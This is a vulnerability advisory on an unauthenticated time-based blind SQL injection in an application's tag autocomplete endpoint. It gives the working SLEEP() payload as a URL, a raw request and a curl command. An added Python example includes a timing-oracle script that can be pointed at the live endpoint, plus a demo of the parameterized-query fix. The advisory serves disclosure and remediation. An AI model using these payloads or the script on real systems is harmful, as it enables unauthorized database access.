The application was found to be vulnerable to an unauthenticated, time-based blind SQL injection in the /tags/autocomplete page. The value of the GET parameter term is not sufficiently sanitized before it is used in a database query, so an attacker can inject SQL and infer the outcome from the response time.
To reproduce, request the following URL and observe that the server's response is delayed by roughly 10 seconds, the value passed to SLEEP():

http://icms.local/tags/autocomplete?term=')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1='

Raw request:

GET /tags/autocomplete?term=')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=' HTTP/1.1
Host: icms.local
X-Requested-With: XMLHttpRequest
Equivalent curl command:

curl -i -s -k -X $'GET' \
-H $'Host: icms.local' -H $'X-Requested-With: XMLHttpRequest' \
$'http://icms.local/tags/autocomplete?term=\')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=\''
As long as the X-Requested-With: XMLHttpRequest header is present in the request, no session or authentication is required: an unauthenticated attacker can send the request directly and inject into the affected parameter.

It is recommended to pass the term parameter to the database through a parameterized query (prepared statement) instead of concatenating it into the SQL string. Escaping or sanitizing the value alone is not a reliable fix; the query structure must be fixed so that user input can only ever be data.
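The following is an added worked example, not code from the advisory or from the affected application. It shows why the payload is shaped the way it is (the leading ') closes the application's own quote and parenthesis, the trailing (1=' borrows the closing quote and parenthesis the application appends), gives a small timing oracle that can be pointed at the real endpoint, and contrasts string concatenation with a parameterized query. The query shape SELECT name FROM tags WHERE (name LIKE '%...%') is an assumption: the advisory does not show the application's SQL. SQLite has no SLEEP(), so the offline part of the demonstration uses a boolean oracle (rows returned or not) with the same quote balancing; the timing part is exercised against a constructed stand-in server that honours SLEEP(n).

```python
import re
import sqlite3
import time
import urllib.parse
import urllib.request


def sleep_payload(seconds: float) -> str:
    """Payload from the advisory, parameterized on the sleep duration."""
    return f"') AND (SELECT 1 FROM (SELECT(SLEEP({seconds})))x) AND (1='"


def vulnerable_sql(term: str) -> str:
    """Assumed shape of the autocomplete query (hypothetical, not from the
    advisory): the term is concatenated straight into the statement."""
    return f"SELECT name FROM tags WHERE (name LIKE '%{term}%')"


def time_based_check(send, seconds: float = 10, margin: float = 0.8) -> bool:
    """send(term) performs one request. Returns True when the SLEEP payload
    delays the response by at least `margin` * `seconds` more than a benign
    term, which is the oracle a time-based blind injection relies on."""
    def elapsed(term):
        t0 = time.monotonic()
        send(term)
        return time.monotonic() - t0

    baseline = elapsed("a")
    probe = elapsed(sleep_payload(seconds))
    return probe - baseline >= seconds * margin


def http_sender(base_url: str = "http://icms.local/tags/autocomplete"):
    """Real sender for the affected endpoint; urlencode() turns spaces into
    '+' exactly as in the advisory's URL. Not exercised offline."""
    def send(term):
        url = base_url + "?" + urllib.parse.urlencode({"term": term})
        req = urllib.request.Request(
            url, headers={"X-Requested-With": "XMLHttpRequest"})
        with urllib.request.urlopen(req, timeout=60) as resp:
            return resp.read()
    return send


def fake_sender(term: str) -> bytes:
    """Constructed stand-in for a server that evaluates SLEEP(n) as MySQL
    would; lets the timing oracle be demonstrated without a network."""
    m = re.search(r"SLEEP\(([\d.]+)\)", term)
    if m:
        time.sleep(float(m.group(1)))
    return b"[]"


# Boolean variant for SQLite: same quote balancing, oracle is "any rows?".
BOOL_TRUE_PAYLOAD = "') AND (1=1) AND ('%'='"
BOOL_FALSE_PAYLOAD = "') AND (1=2) AND ('%'='"


def demo_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the application's tags table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tags (name TEXT)")
    conn.executemany("INSERT INTO tags VALUES (?)", [("security",), ("sql",)])
    return conn


def query_vulnerable(conn, term: str) -> list:
    """Concatenation: the injected condition becomes part of the WHERE."""
    return [row[0] for row in conn.execute(vulnerable_sql(term))]


def query_parameterized(conn, term: str) -> list:
    """Fix: the term is bound as data, so the same payload is just a
    literal substring search that matches nothing."""
    return [row[0] for row in conn.execute(
        "SELECT name FROM tags WHERE (name LIKE ?)", (f"%{term}%",))]


if __name__ == "__main__":
    print(vulnerable_sql(sleep_payload(10)))
    print("time oracle (fake server):", time_based_check(fake_sender, seconds=0.5))
    db = demo_db()
    print("vuln  true :", query_vulnerable(db, BOOL_TRUE_PAYLOAD))
    print("vuln  false:", query_vulnerable(db, BOOL_FALSE_PAYLOAD))
    print("safe  true :", query_parameterized(db, BOOL_TRUE_PAYLOAD))
```

To test the real endpoint, call time_based_check(http_sender()) and compare against a second run with a different sleep value; a delay that scales with the SLEEP() argument, rather than a one-off slow response, is what confirms the injection.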